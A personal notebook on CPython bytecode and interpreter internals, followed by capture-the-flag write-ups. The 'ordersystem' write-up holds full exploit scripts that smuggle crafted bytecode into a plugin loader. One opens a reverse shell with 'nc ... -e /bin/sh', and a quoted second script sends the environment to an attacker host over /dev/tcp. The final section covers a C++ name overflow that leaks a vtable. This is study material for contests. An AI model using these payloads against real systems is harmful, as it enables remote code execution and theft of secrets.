            res = PyObject_Vectorcall(exit_func, stack + 1,
                    3 | PY_VECTORCALL_ARGUMENTS_OFFSET, NULL);
            if (res == NULL)
                goto error;

            PUSH(res);
            DISPATCH();
        }

//but in branch 3.9-10:
            /* At the top of the stack are 7 values:
               - (TOP, SECOND, THIRD) = exc_info()
               - (FOURTH, FIFTH, SIXTH) = previous exception for EXCEPT_HANDLER
               - SEVENTH: the context.__exit__ bound method
               We call SEVENTH(TOP, SECOND, THIRD).
               Then we push again the TOP exception and the __exit__
               return value.
            */

Python backgrounds & Innards

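Some overly general material was moved here.

Links on the internals of Python's compilation pipeline. I first thought they could be skipped, but without them nothing made sense, so I came back to read them:

  • stackoverflow: bytecode instance | theory. A very long article that even lists every instruction.
  • Wiki: stack machine vs. register machine
    • Instruction formats are classified into different types depending upon the CPU organization. CPU organization is again classified into three types based on internal storage: Stack machine, Accumulator machine, General purpose organization or General register.
    • Stack machines extend push-down automata with additional load/store operations or multiple stacks and hence are Turing-complete.
    • This leads into context-free grammars and other half-forgotten material. The wiki is too much to finish in one go, so here are some more approachable articles: stackmachine book | Geek
  • python compiler design: the official developer documentation. There is a lot in it and it looks useful, but it is hard to summarize. Better to read the articles it references.
  • python innards: walks through ceval.c.
  • The python C API is also worth a look.
  • So is the data model chapter of the python reference.

This is really messy; I wrote down whatever I came across.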

Misc:
  • The function definition’s body is compiled into a code object. Then the function definition itself is compiled into code (inside the enclosing function body, module, etc.) that, when executed, builds a function object from that code object. (Once you think about how closures must work, it’s obvious why it works that way. Each instance of the closure is a separate function object with the same code object.)

  • dis module: bytecode instructions

    • Changed in version 3.6: Use 2 bytes for each instruction. Previously the number of bytes varied by instruction.

      Changed in version 3.10: The argument of jump, exception handling and loop instructions is now the instruction offset rather than the byte offset.

  • get information about live objects: Inspect

    • Types and members :function.__code__.co_code to get code bytestring or inspect.getmembers([func/module/class]) to see all members.
  • python built-in function: eval & exec. difference: eval accepts only a single expression, exec can take a code block

  • METHOD

    • In Python a method is a function defined inside a class, while a function is just a plain function.
    • bound methods: a function that is an attribute of a class and is accessed via an instance (the common case).
    • unbound methods: Methods that do not have an instance of the class as the first argument. As of Python 3.0, unbound methods have been removed from the language. They are not bound to any specific object of the class. To make such a method work it should be made into a static method.
      • use the @staticmethod decorator or staticmethod().

  • PyObject:

    • All Python objects ultimately share a small number of fields at the beginning of the object’s representation in memory. These fields are PyObject; every object type is an extension of it, and externally objects are only handled as PyObject*.
    • PyVarObject is an extension of PyObject that adds the ob_size field. This is only used for objects that have some notion of length. For example, PyTupleObject starts with a PyVarObject ob_base.
    • co_names is a PyTuple, initialized with names = PyTuple_New(n);.
  • Data model

    • Module: A module object has a namespace implemented by a dictionary object (this is the dictionary referenced by the __globals__ attribute of functions defined in the module). Attribute references are translated to lookups in this dictionary, e.g., m.x is equivalent to m.__dict__["x"]. A module object does not contain the code object used to initialize the module (since it isn’t needed once the initialization is done).
    • Function: not very important here.
    • Objects are Python’s abstraction for data. Every object has an identity, a type and a value. An object’s type determines the operations that the object supports (e.g., “does it have a length?”) and also defines the possible values for objects of that type.
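
Two of the notes above (closures sharing one code object, and a module namespace being a dict) can be checked directly. This is only a small sketch; make_adder and the module name demo are made up for the illustration.

```python
import types

def make_adder(n):
    def add(x):
        return x + n
    return add

add1, add2 = make_adder(1), make_adder(2)
# Two distinct function objects built from one shared code object.
print(add1 is add2, add1.__code__ is add2.__code__)

# A module's namespace is a dict; attribute access is a lookup in it.
demo = types.ModuleType("demo")          # hypothetical module name
demo.x = 42
print(demo.__dict__["x"])

# Functions defined in a module reference that dict via __globals__.
exec("def f(): return x", demo.__dict__)
print(demo.f.__globals__ is demo.__dict__, demo.f())
```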

Besides python innards, this post, written three years ago, is more recent. It also has some nice diagrams.

Intro & AST
  • src structure(in Linux platform)

    • Include — header files
    • Objects — object implementations, from int to type
    • Python — interpreter, bytecode compiler and other essential infrastructure
    • Parser — parser, lexer and parser generator
    • Modules — stdlib extension modules, and main.c
    • Programs — not much, but has the real main() function

    when it comes to modern windows, lookup PCBuild — Tools to build Python for modern Windows using Visual Studio

  • Not sure which one to read first; starting with the newest one.

  • Grammar is written in BNF. https://en.m.wikipedia.org/wiki/Backus%E2%80%93Naur_form

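  • Interpreter workflow (figure: Python run swim lane diagram)
  • I skipped the AST part and looked at definitions such as the object types instead. For example, the value stack is really made of PyObject * entries.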
  • The PyAST_CompileObject() function is the main entry point to the CPython compiler.
  • But before the compiler starts, a global compiler state is created
struct compiler {
    PyObject *c_filename;
    struct symtable *c_st;
    PyFutureFeatures *c_future; /* pointer to module's __future__ */
    PyCompilerFlags *c_flags;

    int c_optimize;              /* optimization level */
    int c_interactive;           /* true if in interactive mode */
    int c_nestlevel;
    int c_do_not_emit_bytecode;  /* The compiler won't emit any bytecode
                                    if this value is different from zero.
                                    This can be used to temporarily visit
                                    nodes without emitting bytecode to
                                    check only errors. */

    PyObject *c_const_cache;     /* Python dict holding all constants,
                                    including names tuple */
    struct compiler_unit *u;	 /* compiler state for current block */
    PyObject *c_stack;           /* Python list holding compiler_unit ptrs */ //notice this line!!!!!!!!!!!!!!!!!
    PyArena *c_arena;            /* pointer to memory allocation arena */
};
  • then PyAST_CompileObject does the following things:
    • some flag initializations …
    • Build a symbol table from the module object.
    • Run the compiler with the compiler state and return the code object.
    • Free any allocated memory by the compiler.
symbol table
  • In PyAST_CompileObject() there was a reference to a symtable and a call to PySymtable_BuildObject() with the module to be executed. The purpose of the symbol table is to provide a list of namespaces, globals, and locals for the compiler to use for referencing and resolving scopes.
Core Compilation Process
  • Now that the PyAST_CompileObject() has a compiler state, a symtable, and a module in the form of the AST, the actual compilation can begin.
  • in cpython 3.11 branch, the PyCodeObject is in Include\cpython\code.h and is a macro.
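  • I gave up here: these compilation details are not helpful for now.
Assembly

As the name says; nothing special.

Conclusion

A rough picture of the compilation process is enough.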

Execution
  • This stage forms the execution component of CPython. Each of the bytecode operations is taken and executed using a “Stack Frame” based system.
  • Before a frame can be executed, it needs to be referenced from a thread. CPython can have many threads running at any one time within a single interpreter. An Interpreter state includes a list of those threads as a linked list. The thread structure is called PyThreadState, and there are many references throughout ceval.c.
Frame Execution
  • Frames are executed in the main execution loop inside _PyEval_EvalFrameDefault(). This is the central function that brings everything together and brings your code to life. It contains decades of optimization, since even a single line of code can have a significant impact on performance for the whole of CPython.
The Value Stack

This is the part I wanted to see.

  • PyObject **stack_pointer points to the slot just above the top of the stack (the next free slot).
  • switch in ceval.c:
    • any operation that fails must goto error; all operations that succeed call DISPATCH()
    • DISPATCH(): if tracing is enabled, do the trace; if tracing is not enabled, a goto is called to dispatch_opcode, which jumps back to the top of the loop for the next instruction.
    • PREDICT() does what its name says: it guesses the next opcode. When the prediction succeeds, execution jumps straight to that opcode's handler without going through the top of the loop again.
  • Some of the operations, such as CALL_FUNCTION, CALL_METHOD, have an operation argument referencing another compiled function. In these cases, another frame is pushed to the frame stack in the thread, and the evaluation loop is run for that function until the function completes. Each time a new frame is created and pushed onto the stack, the value of the frame’s f_back is set to the current frame before the new one is created.
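
The value stack and the dispatch loop described above can be pictured with a toy interpreter. This is only a sketch of the idea under heavy simplification (instructions are (opname, arg) tuples, no frames, no tracing); it is not how ceval.c is written.

```python
def run(code, consts):
    """Toy evaluation loop over (opname, arg) pairs with a value stack."""
    stack = []          # stack[-1] is TOS; CPython's stack_pointer would sit just past it
    pc = 0
    while True:
        opname, arg = code[pc]
        pc += 1         # plays the role of DISPATCH: move on to the next instruction
        if opname == "LOAD_CONST":
            stack.append(consts[arg])
        elif opname == "BINARY_ADD":
            right = stack.pop()
            left = stack.pop()
            stack.append(left + right)
        elif opname == "BUILD_TUPLE":
            items = tuple(stack[len(stack) - arg:])
            del stack[len(stack) - arg:]
            stack.append(items)
        elif opname == "RETURN_VALUE":
            return stack.pop()
        else:
            # plays the role of "goto error"
            raise ValueError(f"unknown opcode {opname}")

program = [("LOAD_CONST", 0), ("LOAD_CONST", 1), ("BINARY_ADD", 0), ("RETURN_VALUE", 0)]
print(run(program, consts=(2, 3)))
```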

ordersystem wp1 wp2:

src
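  • The input is kept in a dict called ENTRIES. A key is at most 12 bytes and may contain arbitrary bytes, but data may only consist of printable hex digits, with length 0-255.
  • data can be saved into the storage folder under the file name key.decode or key.hex, and directory traversal into the plugins folder is possible.
  • Running a plugin reads the corresponding bytecode file, puts all keys plus plugin_log(msg,filename='./log',raw=False) into the consts of the CodeType, and puts the semicolon-separated bytes that follow the bytecode into names.
    The log function writes the (unrestricted) content of its first argument to ./log. Finally the code is run with exec(). Note, however, that the first argument msg can only come from co_consts, and consts in turn come from the keys.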
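
The plugin loading step described above can be sketched roughly as follows. The challenge source is not reproduced in these notes, so split_plugin and build_consts are hypothetical names and the exact splitting rules are an assumption based on the description (bytecode first, then ';'-separated names; consts are the keys followed by the log function).

```python
def split_plugin(blob: bytes):
    """Split a plugin file into (bytecode, names) on ';'.

    Assumption for illustration: the first ';'-separated field is the
    bytecode and every following field becomes an entry of co_names,
    including empty ones. The real challenge code may differ in details.
    """
    code, *rest = blob.split(b";")
    names = tuple(part.decode() for part in rest)
    return code, names

def build_consts(entries: dict, log_func):
    """consts = all keys in dict iteration order, then the log function."""
    return tuple(entries) + (log_func,)

code, names = split_plugin(b"d0;print;os;")
print(code, names)
```

Under this assumption an extra semicolon directly after the bytecode shifts every name index by one, because the first name becomes an empty string.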

The python version installed in the docker image is 3.10.6

problem
  • because the server hexdumps the data, we can only send printable hex digits, which dramatically reduces our options.
    note that the snippet below is a dict comprehension with a filter condition: it lists the opcodes whose byte value is a hex digit character.

    In [1]: import dis
       ...: {
       ...:     hex(op_code): op_name
       ...:     for op_name, op_code in dis.opmap.items()
       ...:     if chr(op_code) in "0123456789abcdef"
       ...: }
    Out[1]:
    {'0x31': 'WITH_EXCEPT_START',
     '0x32': 'GET_AITER',
     '0x33': 'GET_ANEXT',
     '0x34': 'BEFORE_ASYNC_WITH',
     '0x36': 'END_ASYNC_FOR',
     '0x37': 'INPLACE_ADD',
     '0x38': 'INPLACE_SUBTRACT',
     '0x39': 'INPLACE_MULTIPLY',
     '0x61': 'STORE_GLOBAL',
     '0x62': 'DELETE_GLOBAL',
     '0x63': 'ROT_N',
     '0x64': 'LOAD_CONST',
     '0x65': 'LOAD_NAME',
     '0x66': 'BUILD_TUPLE'}
    
  • but the WITH_EXCEPT_START is something special.

    WITH_EXCEPT_START: Calls the function in position 7 on the stack with the top three items on the stack as arguments. Used to implement the call context_manager.__exit__(*exc_info()) when an exception has occurred in a with statement.

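    • with statement (has more detail) | context manager
    • From the flow of the with statement, the value the with expression evaluates to carries its own manager. For example, the file object returned by open() has __enter__, which does nothing except return the file object, while __exit__ simply calls close().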
                /* At the top of the stack are 7 values:
                   - (TOP, SECOND, THIRD) = exc_info()
                   - (FOURTH, FIFTH, SIXTH) = previous exception for EXCEPT_HANDLER
                   - SEVENTH: the context.__exit__ bound method
                   We call SEVENTH(TOP, SECOND, THIRD).
                   Then we push again the TOP exception and the __exit__
                   return value.
                */
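
To make the stack layout in the comment concrete, here is a small model of the 3.9-3.10 behaviour on a Python list. It is a sketch only: with_except_start_310 and fake_plugin_log are made-up names, and only the push of the return value is modelled.

```python
def with_except_start_310(stack):
    """Model of WITH_EXCEPT_START as described for CPython 3.9-3.10.

    `stack` is a Python list whose last element is TOS. The callable in
    position 7 is invoked with (TOP, SECOND, THIRD) and its result is pushed.
    """
    top, second, third = stack[-1], stack[-2], stack[-3]
    exit_func = stack[-7]
    stack.append(exit_func(top, second, third))
    return stack

def fake_plugin_log(msg, filename="./log", raw=False):
    # Stand-in for the challenge's plugin_log; it only records its arguments.
    return ("logged", msg, filename, raw)

# Push order: callable four times (position 7 plus three fillers), then raw, filename, msg.
stack = [fake_plugin_log] * 4 + [True, "./log", b"chunk"]
with_except_start_310(stack)
print(stack[-1])
```

The opcode never checks that the seventh item is an __exit__ method or that the top three items describe an exception, which is why any callable with three arguments can be invoked this way.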
    

The procedure below only worked after repeated revisions.

  1. Calculate proof of work to get the real target port (never encountered when running locally in docker).
  2. Craft python bytecode which will spawn a reverse shell to the attacker’s machine as exp_bc
  3. Divide exp_bc into chunks of 12 bytes
  4. Upload filler keys to pad consts towards 0x30 items.
  5. Upload num_chunks plugins and dump()
  6. Store the exp_bc chunks as keys in the storage
  7. Run one plugin for each chunk, which appends that key to the log file (which becomes the exploit plugin)
  8. Upload the nc command string.
  9. Run the exploit plugin
proof of work

?

reverse shell
# This is the index where we will later store the nc command
nc_index = 55
co_names = ["len", "list", "print", "os", "system", "decode"]
exploit_asm = [
    # Get length of empty list to push 0 on the stack
    ("BUILD_LIST", 0),
    # GET_LEN takes no argument, so the operand byte is ignored; 0x09 (the NOP opcode) is just a filler. The instruction pushes len(TOS), here the int 0.
    ("GET_LEN", 0x09),
    # Invoke print() to push None onto the stack
    ("LOAD_NAME", co_names.index("print")),
    ("CALL_FUNCTION", 0),
    # Import os
    ("IMPORT_NAME", co_names.index("os")),
    # Invoke os.system()
    ("LOAD_METHOD", co_names.index("system")),
    # Decode first batch of nc command
    ("LOAD_CONST", nc_index),  # loads a bytes object (the keys are bytes), so decode() can be called on it
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Decode second batch of nc command
    ("LOAD_CONST", nc_index + 1),
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Decode third batch of nc command
    ("LOAD_CONST", nc_index + 2),
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Concatenate the three strings
    ("BUILD_STRING", 3),
    # Finally invoke the nc command
    ("CALL_METHOD", 1)
]

Then, we can “assemble” the code:

exp_bc = b''
for op, arg in exploit_asm:
    exp_bc += bytes([dis.opmap[op], arg])
for name in co_names:
    exp_bc += b';' + name.encode()
exp_bc += b';'

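As can be seen, the instruction format is very simple: one opcode byte followed by one operand byte.

  • Why semicolons? The challenge source splits on semicolons and adds the pieces after the bytecode to CodeObject.names.
  • Note nc_index: this offset is only fixed after all keys have been uploaded. Because the operands in limit_code must be printable hex characters, the nc command strings and the limit_code operands are placed in consts[0x30:0x40].
  • A self-inflicted pitfall: I had also appended a semicolon to bc before the second for loop, which made the first entry of co_names an empty byte string and shifted every index. That produced odd errors such as No module named 'print'.
  • I was puzzled why print, which is only a string in names, is treated as callable by CALL_FUNCTION. LOAD_NAME does not just fetch the name string from names: it looks the name up in the local and global scopes (and then builtins) and pushes the object found. Here print resolves to a callable, so CALL_FUNCTION can call it.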
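
The lookup that LOAD_NAME performs can be emulated in a few lines. This is a sketch of the lookup order only (locals, then globals, then builtins); the function load_name below is a made-up helper, not a CPython API.

```python
import builtins

def load_name(name, f_locals, f_globals):
    """Emulate the lookup order of LOAD_NAME: locals, globals, builtins."""
    for scope in (f_locals, f_globals, vars(builtins)):
        if name in scope:
            return scope[name]
    raise NameError(f"name {name!r} is not defined")

co_names = ["len", "list", "print", "os", "system", "decode"]
obj = load_name(co_names[2], {}, {})
print(obj is print, callable(obj))
```

With empty local and global scopes the name print still resolves, because the builtins namespace is searched last.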
Fill the first 48 slots of consts
#fill slots
chunk_size = 12
num_chunks = len(exp_bc) // chunk_size + 1
# num_chunk is 6, limit_code is 6, total is 12, and plugin_log will be 13
for i in range(48 - num_chunks):
    upload_key(b'{{{{{{{{{{%d' % (i+10))

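48 = 0x30. To make the data land at index 0x30 and above, the slots before it are filled first; the last 6 of those 48 slots are left for the limit_code plugin keys uploaded next.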
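
The index arithmetic can be written down as a small calculation. This sketch assumes that keys appear in consts in upload order and that plugin_log is appended last; consts_layout is a hypothetical helper, and the upload order it encodes is the one used in this writeup.

```python
def consts_layout(num_chunks, total_before=0x30):
    """Index plan for co_consts, following the upload order in this writeup."""
    fillers = total_before - num_chunks          # filler keys uploaded first
    plugin_keys = range(fillers, total_before)   # '../plugins/<i>' keys
    chunk_keys = range(total_before, total_before + num_chunks)  # exp_bc chunks
    fn_idx = total_before + num_chunks           # 'plugins/expl' file name key
    func_idx = fn_idx + 1                        # plugin_log object, last const
    return {
        "fillers": fillers,
        "plugin_keys": (plugin_keys.start, plugin_keys.stop - 1),
        "chunk_keys": (chunk_keys.start, chunk_keys.stop - 1),
        "fn_idx": fn_idx,
        "func_idx": func_idx,
    }

print(consts_layout(6))
```

For six chunks this gives 42 fillers, chunk keys at 0x30 to 0x35, the file name key at 0x36 and plugin_log at 0x37 (55).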

Upload limit_code
#upload limit_code as several plugins in data
func_idx = 48+6+1
msg_idx = 0x30
fn_idx = 0x30+6
raw_idx = 0x30
for i in range(num_chunks):
    bc = get_plugin_code(i+msg_idx, func_idx, fn_idx, raw_idx)
    store(b'../plugins/%d' % i, bc)
dump()

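These indices were all filled in after the fact. raw can be any non-empty value, and func_idx is the last entry of consts.

Another issue: func_idx is already 55, so there is no room before it for the three command chunks. The command can therefore only be uploaded after the six plugins have been executed.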
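
A quick way to confirm that a limit_code plugin survives the hex-only filter is to build it with fixed opcode values and check every byte. This is a sketch that mirrors get_plugin_code; the opcode numbers are the CPython 3.10 values from the dis.opmap listing earlier, and build_limit_code is a hypothetical name.

```python
HEX_CHARS = b"0123456789abcdef"
# Opcode values for CPython 3.10, as listed in the dis.opmap output earlier.
LOAD_CONST = 0x64
WITH_EXCEPT_START = 0x31

def build_limit_code(msg_idx, func_idx, fn_idx, raw_idx):
    """Same shape as get_plugin_code, with hard-coded 3.10 opcode values."""
    code = (
        bytes([LOAD_CONST, func_idx]) * 4        # position 7 callable + 3 fillers
        + bytes([LOAD_CONST, raw_idx])           # THIRD  -> raw
        + bytes([LOAD_CONST, fn_idx])            # SECOND -> filename
        + bytes([LOAD_CONST, msg_idx])           # TOP    -> msg
        + bytes([WITH_EXCEPT_START, 0x30])
    )
    bad = [b for b in code if b not in HEX_CHARS]
    if bad:
        raise ValueError(f"non-hex bytes in plugin code: {bad}")
    return code

print(build_limit_code(0x30, 0x37, 0x36, 0x30))
```

Any operand outside 0x30-0x39 or 0x61-0x66 makes the check fail, which is the reason the interesting consts have to sit at index 0x30 and above.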

Upload exploit bytecode in chunks
exp_bc = exp_bc.ljust(num_chunks*chunk_size, b';')
exp_block = []
for i in range(0, len(exp_bc), chunk_size):
    exp_block.append(exp_bc[i:i+chunk_size])
    upload_key(exp_block[-1])

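After the exploit is split into chunks and uploaded as keys, several limit_code plugins are uploaded. Each one appends the exp_bc chunk held in one key to the log (here actually a file under ./plugins), so the chunks concatenate into the exploit.

  • Keys are added to consts by iterating over the dict. I first assumed the order was descending lexicographic order, because my test initialized a dict literal and printed it. In fact a for loop yields keys in insertion order. The last const is the plugin_log function object. As a result the msg offset differs for each limit_code, while filename and raw are the same.
  • That raised another question: does for k in entries yield tuples from the dict? How would a tuple be loaded with LOAD_CONST and then decoded?

My Python is not up to scratch: list(dict) only returns the keys, and so does for k in dict.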

iter(d): Return an iterator over the keys of the dictionary. This is a shortcut for iter(d.keys()).

>>>d
{'one': 1, 'two': 2, 'three': 3, 'four': 4}
>>>list(d)
['one', 'two', 'three', 'four']
>>>list(d.values())
[1, 2, 3, 4]
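
The ordering question can be settled with a short check. Since Python 3.7 dicts are guaranteed to iterate in insertion order, so the keys below come back in the order they were added, not sorted. The keys are made up for the illustration.

```python
entries = {}
for key in (b"zzz", b"aaa", b"mmm"):     # hypothetical keys, deliberately unsorted
    entries[key] = b"deadbeef"

keys_in_loop = [k for k in entries]       # iterating a dict yields its keys only
print(keys_in_loop)
print(keys_in_loop == sorted(entries))
```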
Upload additional consts & construct ./expl
#used for plugins
upload_key(b'plugins/expl')

#exec plugins to store exp to plugins/expl
for i in range(6):
    plugin(f'../plugins/{i}'.encode())

#used for ./expl
ip = '127.0.0.1'
rev_port = 5555
commmand = f"nc {ip} {rev_port} -e /bin/sh".ljust(chunk_size * 3, " ")
upload_key(commmand[:chunk_size])
upload_key(commmand[chunk_size : 2 * chunk_size])
upload_key(commmand[2 * chunk_size :])

Why a plugin run is sandwiched between the two uploads is explained above.

REVERSE SHELL
rev_shl = listen(rev_port)
plugin(f'expl'.ljust(12, ' ').encode())
rev_shl.sendline(b'echo $flag')
flag = rev_shl.recvline(False)
log.success(flag)

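This did not actually work for me: I do not know how a program inside the container can connect to a port the host is already listening on. In a real attack a public IP is also needed for the reverse connection, which I have not dealt with yet.

Locally, the exploit was verified from inside the container.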

complete exp:

from pwn import *
import dis
context.log_level = 'info'
context.arch = 'amd64'

def store(key: bytes, data: bytes):
    assert len(key) <= 12, 'store key len'
    assert len(list(filter(lambda x: x in '0123456789abcdef', data.decode()))
               ) == len(data) and len(data) < 0x80, "data has to be in hex format"
    p = remote('127.0.0.1', 4444)
    p.send(b'S')
    p.send(key)
    p.send(chr(len(data)))
    p.send(data)
    p.recvuntil(f'{key}\n'.encode(), timeout=1)
    p.close()
def dump():
    p = remote('127.0.0.1', 4444)
    p.send(b'D')
    p.clean()
    p.close()
def plugin(name):
    assert len(name) == 12
    p = remote('127.0.0.1', 4444)
    p.send(b'P')
    p.send(name)
    p.clean(timeout = 0.3)
    p.close()
def load_const(idx):
    return bytes([dis.opmap['LOAD_CONST'], idx])
def load_name(idx):
    return bytes([dis.opmap['LOAD_NAME'], idx])
def upload_key(key):
    if isinstance(key, str):
        key = key.encode()
    store(key, b'deadbeef')
def get_plugin_code(msg_idx, func_idx, fn_idx, raw_idx):
    log.success(f'four args: {msg_idx} {func_idx} {fn_idx} {raw_idx}')
    return (
        #load seventh callable to plugin_log + unused 456
        load_const(func_idx) * 4 +
        #load top three args
        load_const(raw_idx) + load_const(fn_idx) + load_const(msg_idx) +
        #call log()
        bytes([dis.opmap['WITH_EXCEPT_START'], 0x30])
    )

# This is the index where we will later store the nc command
nc_index = 55
co_names = ["len", "list", "print", "os", "system", "decode"] #, '0', '1', '2', '3', '4', '5']
exploit_asm = [
    # Get length of empty list to push 0 on the stack
    ("BUILD_LIST", 0),
    # GET_LEN takes no argument, so the operand byte is ignored; 0x09 (the NOP opcode) is just a filler. The instruction pushes len(TOS), here the int 0.
    ("GET_LEN", 0x09),
    # Invoke print() to push None onto the stack
    ("LOAD_NAME", co_names.index("print")),
    ("CALL_FUNCTION", 0),
    # Import os
    ("IMPORT_NAME", co_names.index("os")),
    # Invoke os.system()
    ("LOAD_METHOD", co_names.index("system")),
    # Decode first batch of nc command
    ("LOAD_CONST", nc_index),  # loads a bytes object (the keys are bytes), so decode() can be called on it
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Decode second batch of nc command
    ("LOAD_CONST", nc_index + 1),
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Decode third batch of nc command
    ("LOAD_CONST", nc_index + 2),
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Concatenate the three strings
    ("BUILD_STRING", 3),
    # Finally invoke the nc command
    ("CALL_METHOD", 1)
]

exp_bc = b''
for op, arg in exploit_asm:
    exp_bc += bytes([dis.opmap[op], arg])
for name in co_names:
    exp_bc += b';' + name.encode()
exp_bc += b';'

#fill slots
chunk_size = 12
num_chunks = len(exp_bc) // chunk_size + 1
# num_chunk is 6, limit_code is 6, total is 12, and plugin_log will be 13
for i in range(48 - num_chunks):
    upload_key(b'{{{{{{{{{{%d' % (i+10))

#upload limit_code as several plugins in data
func_idx = 48+6+1
msg_idx = 0x30
fn_idx = 0x30+6
raw_idx = 0x30
for i in range(num_chunks):
    bc = get_plugin_code(i+msg_idx, func_idx, fn_idx, raw_idx)
    store(b'../plugins/%d' % i, bc)
dump()

exp_bc = exp_bc.ljust(num_chunks*chunk_size, b';')
exp_block = []
for i in range(0, len(exp_bc), chunk_size):
    exp_block.append(exp_bc[i:i+chunk_size])
    upload_key(exp_block[-1])
print('exp_block:')
print(exp_block)

#fn_idx
upload_key(b'plugins/expl')

#exec plugins to store exp to plugins/expl
for i in range(6):
    plugin(f'../plugins/{i}'.encode())

ip = '127.0.0.1'
rev_port = 5555
commmand = f"nc {ip} {rev_port} -e /bin/sh".ljust(chunk_size * 3, " ")
upload_key(commmand[:chunk_size])
upload_key(commmand[chunk_size : 2 * chunk_size])
upload_key(commmand[2 * chunk_size :])

# rev_shl = listen(rev_port)
plugin(f'expl'.ljust(12, ' ').encode())
# rev_shl.sendline(b'echo $flag')
# flag = rev_shl.recvline(False)
# log.success(flag)
In hindsight this is still more complicated than necessary.

writeup3

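This writeup uses eval() to evaluate the reverse-shell command. The command strings loaded from consts can be concatenated directly with BINARY_ADD (though BUILD_STRING feels nicer). It appends a return to the end of exp_bc, which (probably) avoids the unknown opcode error.

It does not split the writes across multiple plugin files; instead, as the code below shows, a single plugin (../plugins/A) chains all the write calls.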

from ptrlib import *
import time
import os
def make_conn():
    return Socket("localhost", 4444)
    #return Socket("23.88.100.81", 44463)
def store(entry, data):
    assert len(entry) <= 12
    assert len(data) < 0x80
    sock = make_conn()
    sock.send('S')
    sock.send(entry + b'\x00' * (12 - len(entry)))
    sock.send(bytes([len(data) * 2]))
    sock.send(data.hex())
    print(sock.recvline())
    sock.close()
def dump():
    sock = make_conn()
    sock.send('D')
    print(sock.recv())
    sock.close()
def plugin(name):
    sock = make_conn()
    sock.send('P')
    sock.send(name + b'\x00' * (12 - len(name)))
    sock.close()
# '/' is not valid as filename so use \x2f instead
pycode = b"__import__('os').system('bash -c \"env > \\x2fdev\\x2ftcp\\x2f<HOST>\\x2f<PORT>\"')"
pychunks = chunks(pycode, 12, b'\n')
code = bytes([
    116,0x00, # LOAD_GLOBAL (eval)
])
for i in range(len(pychunks)):
    code += bytes([100,i])  # LOAD_CONST
    if i > 0:
        code += bytes([0x17,0x00]) # BINARY_ADD
code += bytes([
    0x09,0xc2,  # NOP
    0x83,0x01, # CALL_FUNCTION 1 (calls eval); 0x83 is CALL_FUNCTION, not LOAD_METHOD as the original comment said
    0x01,0x00, # POP_TOP
    100,0x00, # LOAD_CONST (None)
    83,0x00, # RETURN_VALUE
])
data = code + b";eval;"
blocks = chunks(data, 12, b'\x00')
pos_func = 0x33 + len(blocks)
code = b""
for i in range(len(blocks)):
    code += bytes([
        100,pos_func, 100,0x30, 100,0x30, 100,0x30, # func
        100,0x30, 100,0x32, 100,0x33+i, # raw, filename, msg
        49, 0x30, # call by exception
    ])
code += bytes([53,53])
for piece in pychunks:
    store(piece, b"whatever")
for i in range(0x30 - len(pychunks)):
    store(bytes([0x41 + i] * 12), b"whatever")
store(b"../plugins/A", bytes.fromhex(code.decode()))
store(b"\x00", b"whatever") # stop
store(b".//plugins/B", b"whatever") # filename
for block in blocks:
    store(block, b"whatever") # data
# write ascii bytecode
dump()
time.sleep(0.1)
plugin(b"0123456789/A")
# win!
time.sleep(0.1)
plugin(b"0123456789/B")

RIOT

RIOT src off-by-one

placemat

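  • Seeing a meson.build file, I learned that meson is a build-script generator in the same category as cmake. See the Wiki.

It turned out to be a 32-bit program, with every protection enabled except PIE.

Why does it not run on ubuntu? After installing 2.34 with allinone the symlinks were missing, so it was unusable. On both ubuntu 20.04 and 22.04 it failed with no such file or directory.

I could not get the environment working. Which libraries does this C++ binary use? glibc alone is probably not enough. Giving up on this kind of competition challenge seemed more realistic after half a day without results, but crazyman asked me to look again, so I tried building from source.

  • Learned a bit of meson: meson setup [build directory], then cd [build directory] && meson compile
    • Each build directory has its own configuration; separate folders make testing easier.
    • meson compile == ninja, because meson's default backend is ninja.
  • bits/c++config.h was missing, so I went to install g++-multilib. The libc6-dev version in kali was too old, which held the dependent libglib2.0-dev back as well and prevented installing a newer libglib2.0-dev. Running pc apt --only-upgrade install libc6-dev fixed that. Finally run
    apt install g++-multilib.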

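I still need to get familiar with debugging C++ classes and variable layout.

  • Looked at C++17 optional (post). It is much like Option<T> in rust, which I had just been reading about.
  • I also need to see how a C++ compiler implements classes. Find an article.

Possible issues:

  • scanf("%s", this->name); in Human::requestName does not limit the length. At first I had no idea what it overflows into; now I know.
  • There is also a strcpy with a stack overflow that is of no practical use.
  • The flag can only be obtained by beating the bot.

Then someone else on the team solved it first (as expected): forge the vtable to pose as the bot, then beat yourself to get the flag. I debugged first to see how C++ classes are laid out.

  • Starting with the constructor: the declaration Human human is itself the constructor call. Its argument is a stack pointer, ebp-0x20, which is the this pointer. The parent constructor is then called to clear the name member, which is located relative to this. name does not start at this, though: the first four bytes looked like a number identifying the subclass. They turn out to be the vtable address. An object's vtable pointer points to the vtable of its own class, and entries in the vtable point to the virtual function of the nearest class in the inheritance chain that defines it. Look the address up in IDA for more information.
  • The base class Player has two virtual functions plus a virtual destructor, but the destructor is not defined, so its vtable entry is NULL.
  • An object that goes out of scope has its destructor called directly, e.g. a local object is destroyed at the end of the function.
  • Note that besides vtable for Bot and the like, the file also contains
  • The ABI standard is more complete and saves me from guessing, but it is very long. stackoverflow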

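Further investigation:

  • The stack frame of startSingleplayer() holds the two player objects. Each starts with the vtable pointer and is 4 (vptr) + 20 (name) = 24 = 0x18 bytes in total. name is initially filled with NUL bytes; entering a player name that fills all 20 bytes makes it possible to leak the data that follows. scanf appends a NUL byte, which has to be overwritten before the leak works.
  • human is the variable closest to the bottom of the stack frame, at [ebp-0x20]. There is also a canary at 0xc (12), and the eight bytes at the very bottom are of no use.
  • takeTurn also uses %s, so the output length is not limited.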
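
The 0x18-byte object layout and the leak idea can be modelled with struct. This is a sketch with made-up addresses and a made-up neighbouring pointer; it only shows why a full 20-byte name lets a %s-style read run into the following data once the terminating NUL has been overwritten.

```python
import struct

OBJ_FMT = "<I20s"                       # 32-bit vptr + char name[20]
assert struct.calcsize(OBJ_FMT) == 0x18

def c_string(mem: bytes, start: int) -> bytes:
    """Read bytes from `start` up to (not including) the first NUL, like %s."""
    return mem[start:mem.index(b"\x00", start)]

# Hypothetical frame: one player object followed by 8 NUL bytes of other data.
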